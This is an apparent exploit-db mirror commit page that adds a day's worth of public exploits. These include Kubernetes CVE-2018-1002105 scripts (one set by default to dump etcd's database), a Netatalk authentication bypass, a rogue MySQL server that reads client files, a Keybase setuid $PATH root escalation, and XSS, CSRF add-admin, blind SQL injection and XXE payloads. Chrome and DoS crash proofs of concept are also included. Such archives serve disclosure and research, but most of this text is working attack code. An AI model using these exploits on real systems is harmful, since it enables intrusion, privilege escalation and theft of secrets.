bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-25

Browse source 
15 changes to exploits/shellcodes

Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
Google Chrome 70 - SQLite Magellan Crash (PoC)
Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read
Keybase keybase-redirector - '$PATH' Local Privilege Escalation
Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)
Netatalk - Bypass Authentication
Kubernetes - (Unauthenticated) Arbitrary Requests
Kubernetes - (Authenticated) Arbitrary Requests
WSTMart 2.0.8 - Cross-Site Scripting
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read
PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)

Linux/x86 - Kill All Processes Shellcode (14 bytes)
This commit is contained in:
Offensive Security 2018-12-25 05:01:44 +00:00
parent 0275ca3128
commit 1b31850a46
17 changed files with 1105 additions and 10 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/linux/dos/46038.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
f.write(crash)
f.close()

94
exploits/linux/local/46044.md Normal file
View file

@ -0,0 +1,94 @@
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
## Environment
CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64
RPM info
```
Name : keybase
Version : 2.8.0.20181017144746.3efc4cbf3c
Release : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group : Unspecified
Size : 273302678
License : BSD
Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host : 6ae61e160e87
Relocations : (not relocatable)
Summary : Keybase command line client
Description :
Keybase command line client
```
An unprivileged user named user1 is used for this PoC.
## Steps to reproduce
1) Display privileges of user 1 - execute the id command
```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```
2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
setreuid(0,0);
system("/usr/bin/touch /w00t");
return(0);
}
EOF
``
3) Compile fusermount.c
```
gcc -Wall fusermount.c -o fusermount
```
4) Verify that /w00t does not exist.
```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```
5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```
6) Enter the control-c sequence to kill the application.
```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```
7) Verify that /w00t exists
```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```
## Impact
Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.

136
exploits/multiple/dos/46042.html Normal file
View file

@ -0,0 +1,136 @@
<!---
title: Crash Chrome 70 with the SQLite Magellan bug
categories: chrome
permalink: /sqlitebug/
layout: post
---!>
<p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
<p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
<button onClick="crash()" style="font-size: 150%">Crash this page</button>
<p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
<p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
<h1>Sign up for more information</h1>
<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
<form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank">
<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email">
<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div>
<input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button">
</form>
<h1>What's supposed to happen?</h1>
<p>After you press the button, the page should crash:</p>
<p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p>
<p>On Android 5.1, I get a segfault in memcpy:</p>
<pre style="font-size: 10px">
F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
I/DEBUG ( 142): Revision: '0'
I/DEBUG ( 142): ABI: 'arm'
I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<<
I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000
I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff
I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000
I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430
I/DEBUG ( 142):
I/DEBUG ( 142): backtrace:
I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217)
I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk
</pre>
<h1>What's affected?</h1>
<p>Affected: tested, causes one tab/one window to crash:</p>
<ul>
<li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
<li>Electron 2.0.12 on macOS 10.14</li>
</ul>
<p>Not affected:</p>
<ul>
<li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
<li>Safari (doesn't have FTS enabled in SQLite3)</li>
<li>Browsers not based on Chrome (no WebSQL support)</li>
</ul>
<script>
// https://gist.github.com/nolanlawson/0264938033aca2201012
// https://www.sqlite.org/src/info/940f2adc8541a838
const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
const firstStatements = [
"DROP TABLE IF EXISTS ft;",
"CREATE VIRTUAL TABLE ft USING fts3;",
"INSERT INTO ft VALUES('aback');",
"INSERT INTO ft VALUES('abaft');",
"INSERT INTO ft VALUES('abandon');",
];
const secondStatements = [
"SELECT quote(root) from ft_segdir;",
"UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
"SELECT * FROM ft WHERE ft MATCH 'abandon';"
];
function dbSuccess() {
console.log("success");
console.log(arguments);
}
function dbErr() {
console.log("err");
console.log(arguments);
}
function runAll(statements, success) {
db.transaction((tx) => {
console.log("alive");
for (const statement of statements) {
console.log("queueing " + statement);
tx.executeSql(statement, [], dbSuccess, dbErr);
}
console.log("queued");
}, dbErr, success);
}
function crash() {
runAll(firstStatements, (event) => {
console.log(event);
runAll(secondStatements, (event) => {
console.log(event);
});
});
}
// onload
function getChromeVersion(userAgent) {
for (const part of userAgent.split(" ")) {
if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) {
return part.substring(part.indexOf("/") + 1);
}
}
return null;
}
function isChromeSupported(chromeVersion) {
if (chromeVersion == null) return false;
const firstPart = chromeVersion.substring(0, chromeVersion.indexOf("."));
return parseInt(firstPart) <= 70;
}
function getPromptText(userAgent) {
const chromeVersion = getChromeVersion(userAgent);
if (chromeVersion == null) {
return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
}
const chromeOK = isChromeSupported(chromeVersion);
if (chromeOK) {
return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page.";
}
return "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
}
function onLoad() {
document.getElementById("browserUserAgent").textContent = navigator.userAgent;
document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent);
}
window.onload = onLoad;
</script>

44
exploits/multiple/remote/46048.py Executable file
View file

@ -0,0 +1,44 @@
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print resp
print "[+] Fin."

169
exploits/multiple/remote/46052.py Executable file
View file

@ -0,0 +1,169 @@
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from json import loads, dumps
from socket import create_connection
def request_stage_1(base, version, target):
stage_1 = ""
with open('ustage_1', 'r') as stage_1_fd:
stage_1 = stage_1_fd.read()
return stage_1.format(base, version, target
).encode('utf-8')
def request_stage_2(base, version, target_api, target):
stage_2 = ""
with open('ustage_2', 'r') as stage_2_fd:
stage_2 = stage_2_fd.read()
return stage_2.format(base, version, target_api, target,
).encode('utf-8')
def read_data(ssock):
data = []
data_incoming = True
while data_incoming:
data_in = ssock.recv(4096)
if not data_in:
data_incoming = False
elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
data_incoming = False
offset_1 = data_in.find(b'{')
offset_2 = data_in.find(b'}\n')
if offset_1 != -1 and offset_2 != -1:
data_in = data_in[offset_1-1:offset_2+1]
elif offset_1 != -1:
data_in = data_in[offset_1-1:]
elif offset_2 != -1:
data_in = data_in[:offset_2-1]
data.append(data_in)
return data
def run_exploit(target, stage_1, stage_2, filename, json):
host, port = target.split(':')
with create_connection((host, port)) as sock:
with wrap_socket(sock) as ssock:
print('[*] Building pipe ...')
ssock.send(stage_1)
data_in = ssock.recv(15)
if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')
read_data(ssock)
else:
print('[-] Not sure if this went well...')
print(f"[*] Attempting to access url")
ssock.send(stage_2)
data_in = ssock.recv(15)
if b'HTTP/1.1 200 OK' in data_in:
print('[+] Pipe opened :D')
data = read_data(ssock)
return data
def parse_output(data, json, filename):
if json:
j = loads(''.join(i.decode('utf-8')
for i in data))
data = dumps(j, indent=4)
if filename:
mode = 'w+'
else:
mode = 'wb+'
if filename:
print(f"[*] Writing output to {filename} ....")
with open(filename, mode) as fd:
if json:
fd.write(data)
else:
for msg in data:
fd.write(msg)
print('[+] Done!')
else:
if json:
print(data)
else:
print(''.join(msg.decode('unicode_escape') for msg in data))
def main():
parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
' CVE-2018-1002105')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('--target', '-t', dest='target', type=str,
help='API server target:port', required=True)
required.add_argument('--api-base', '-b', dest='base', type=str,
help='Target API name i.e. "servicecatalog.k8s.io"',
default="servicecatalog.k8s.io")
required.add_argument('--api-target', '-u', dest='target_api', type=str,
help='API to access i.e. "clusterservicebrokers"',
default="clusterservicebrokers")
optional.add_argument('--api-version', '-a', dest='version', type=str,
help='API version to use i.e. "v1beta1"',
default="v1beta1")
optional.add_argument('--json', '-j', dest='json', action='store_true',
help='Print json output', default=False)
optional.add_argument('--filename', '-f', dest='filename', type=str,
help='File to save output to', default=False)
args = parser.parse_args()
if args.target.find(':') == -1:
print("f[-] invalid target {args.target}")
return False
stage1 = request_stage_1(args.base, args.version, args.target)
stage2 = request_stage_2(args.base, args.version, args.target_api,
args.target)
output = run_exploit(args.target, stage1, stage2, args.filename, args.json)
parse_output(output, args.json, args.filename)
if __name__ == '__main__':
main()

132
exploits/multiple/remote/46053.py Executable file
View file

@ -0,0 +1,132 @@
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from socket import create_connection
from secrets import base64, token_bytes
def request_stage_1(namespace, pod, method, target, token):
stage_1 = ""
with open('stage_1', 'r') as stage_1_fd:
stage_1 = stage_1_fd.read()
return stage_1.format(namespace, pod, method, target,
token).encode('utf-8')
def request_stage_2(target, namespace, pod, container, command):
stage_2 = ""
command = f"command={'&command='.join(command.split(' '))}"
with open('stage_2', 'r') as stage_2_fd:
stage_2 = stage_2_fd.read()
key = base64.b64encode(token_bytes(20)).decode('utf-8')
return stage_2.format(namespace, pod, container, command,
target, key).encode('utf-8')
def run_exploit(target, stage_1, stage_2, method, filename, ppod,
container):
host, port = target.split(':')
with create_connection((host, port)) as sock:
with wrap_socket(sock) as ssock:
print(f"[*] Building pipe using {method}...")
ssock.send(stage_1)
if b'400 Bad Request' in ssock.recv(4096):
print('[+] Pipe opened :D')
else:
print('[-] Not sure if this went well...')
print(f"[*] Attempting code exec on {ppod}/{container}")
ssock.send(stage_2)
if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096):
print('[-] Exploit failed :(')
return False
data_incoming = True
data = []
while data_incoming:
data_in = ssock.recv(4096)
data.append(data_in)
if not data_in:
data_incoming = False
if filename:
print(f"[*] Writing output to {filename} ....")
with open(filename, 'wb+') as fd:
for msg in data:
fd.write(msg)
print('[+] Done!')
else:
print(''.join(msg.decode('unicode-escape')
for msg in data))
def main():
parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
required.add_argument('--target', '-t', dest='target', type=str,
help='API server target:port', required=True)
required.add_argument('--jwt', '-j', dest='token', type=str,
help='JWT token for service account', required=True)
required.add_argument('--namespace', '-n', dest='namespace', type=str,
help='Namespace with method access',
default='default')
required.add_argument('--pod', '-p', dest='pod', type=str,
required=True, help='Pod with method access')
required.add_argument('--method', '-m', dest='method', choices=['exec',
'portforward', 'attach'], required=True)
optional.add_argument('--privileged-namespace', '-s', dest='pnamespace',
help='Target namespace', default='kube-system')
optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str,
help='Target privileged pod',
default='etcd-kubernetes')
optional.add_argument('--container', '-c', dest='container', type=str,
help='Target container', default='etcd')
optional.add_argument('--command', '-x', dest='command', type=str,
help='Command to execute',
default='/bin/cat /var/lib/etcd/member/snap/db')
optional.add_argument('--filename', '-f', dest='filename', type=str,
help='File to save output to', default=False)
args = parser.parse_args()
if args.target.find(':') == -1:
print(f"[-] invalid target {args.target}")
return False
stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target,
args.token)
stage2 = request_stage_2(args.target, args.pnamespace, args.ppod,
args.container, args.command)
run_exploit(args.target, stage1, stage2, args.method, args.filename,
args.ppod, args.container)
if __name__ == '__main__':
main()

25
exploits/php/webapps/46035.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage: https://github.com/wstmall/wstmart/
# Software Link: http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE: CVE-2018-20367
# 0x01 stored XSS (PoC)
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454
goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E

51
exploits/php/webapps/46036.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/index.php/admin/staffs/add.html" id="test" name='test' method="POST">
<input type="hidden" name='staffId' value="" />
<input type="hidden" name='loginName' value="" />
<input type="hidden" name='staffPhoto' value="" />
<input type="hidden" name='loginPwd' value="" />
<input type="hidden" name='staffName' value="" />
<input type="hidden" name='staffNo' value="" />
<input type="hidden" name='RoleId' value="" />
<input type="hidden" name='staffPhone' value="" />
<input type="hidden" name='wxOpenId' value="" />
<input type="hidden" name='workStatus' value="" />
<input type="hidden" name='staffStatus' value="" />
</form>
<script type="text/javascript">
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
</script>
</body>
</html>

37
exploits/php/webapps/46037.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
# Google Dork: N/A
# Date: 2018-12-22
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://frontaccounting.com/
# Software Link: https://sourceforge.net/projects/frontaccounting/
# Version: 2.4.5
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
# CVE : N/A
# ========================= Vendor Summery =====================
#
# FrontAccounting (FA) is a professional web-based Accounting system for
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
# multicurrency.
#
# ======================== Vulnerability Description ===============
#
# the parameter "filterType" in /attachments.php is Vulnerable to Time
# Based Blind SQL Injection.
#
# ======================== PoC =======================================
POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 367
DNT: 1
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx

260
exploits/php/webapps/46041.py Executable file
View file

@ -0,0 +1,260 @@
#!/usr/bin/env python
#coding: utf8
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)
filelist = (
# r'c:\boot.ini',
r'c:\windows\win.ini',
# r'c:\windows\system32\drivers\etc\hosts',
# '/etc/passwd',
# '/etc/shadow',
)
#================================================
#=======No need to change after this lines=======
#================================================
__author__ = 'Gifts'
def daemonize():
import os, warnings
if os.name != 'posix':
warnings.warn('Cant create daemon on non-posix system')
return
if os.fork(): os._exit(0)
os.setsid()
if os.fork(): os._exit(0)
os.umask(0o022)
null=os.open('/dev/null', os.O_RDWR)
for i in xrange(3):
try:
os.dup2(null, i)
except OSError as e:
if e.errno != 9: raise
os.close(null)
class LastPacket(Exception):
pass
class OutOfOrder(Exception):
pass
class mysql_packet(object):
packet_header = struct.Struct('<Hbb')
packet_header_long = struct.Struct('<Hbbb')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload
def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
result = "{0}{1}".format(
header,
self.payload
)
return result
def __repr__(self):
return repr(str(self))
@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]
return mysql_packet(packet_num, payload)
class http_request_handler(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'3.0.0-Evil_Mysql_Server' + '\0', # Version
#'5.1.66-0+squeeze1' + '\0',
'\x36\x00\x00\x00', # Thread ID
'evilsalt' + '\0', # Salt
'\xdf\xf7', # Capabilities
'\x08', # Collation
'\x02\x00', # Server Status
'\0' * 13, # Unknown
'evil2222' + '\0',
))
)
)
self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']
def push(self, data):
log.debug('Pushed: %r', data)
data = str(data)
asynchat.async_chat.push(self, data)
def collect_incoming_data(self, data):
log.debug('Data recved: %r', data)
self.ibuffer.append(data)
def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []
if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
# Fix ?
self.order = packet.packet_num + 2
if packet.packet_num == 0:
if packet.payload[0] == '\x03':
log.info('Query')
filename = random.choice(filelist)
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(filename)
)
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
if self.sub_state == 'File':
log.info('-- result')
log.info('Result: %r', data)
if len(data) == 1:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
raise LastPacket()
else:
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1
elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
else:
log.info('-- else')
raise ValueError('Unknown packet')
except LastPacket:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
log.warning('Out of order')
self.push(None)
self.close_when_done()
else:
log.error('Unknown state')
self.push('None')
self.close_when_done()
class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind(('', PORT))
except socket.error:
exit()
self.listen(5)
def handle_accept(self):
pair = self.accept()
if pair is not None:
log.info('Conn from: %r', pair[1])
tmp = http_request_handler(pair)
z = mysql_listener()
daemonize()
asyncore.loop()

42
exploits/php/webapps/46050.txt Normal file
View file

@ -0,0 +1,42 @@
# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library.
# Affected Version
Versions <=1.5.0
# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
# XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
# Vulnerability Details
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
Vulnerability: CWE-611
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
```
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.

20
exploits/windows/dos/46002.py
View file

@ -1,13 +1,13 @@
# Exploit Title: AnyBurn
# Date: 15-12-2018=20
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
=20
# Steps to Produce the Crash:=20
# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
@ -16,13 +16,13 @@
#!/usr/bin/env python
buffer =3D "\x41" * 10000
buffer = "\x41" * 10000
try:
=09f=3Dopen("Evil.txt","w")
=09print "[+] Creating %s bytes evil payload.." %len(buffer)
=09f.write(buffer)
=09f.close()
=09print "[+] File created!"
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
=09print "File cannot be created"
print "File cannot be created"

23
exploits/windows/local/46040.txt Normal file
View file

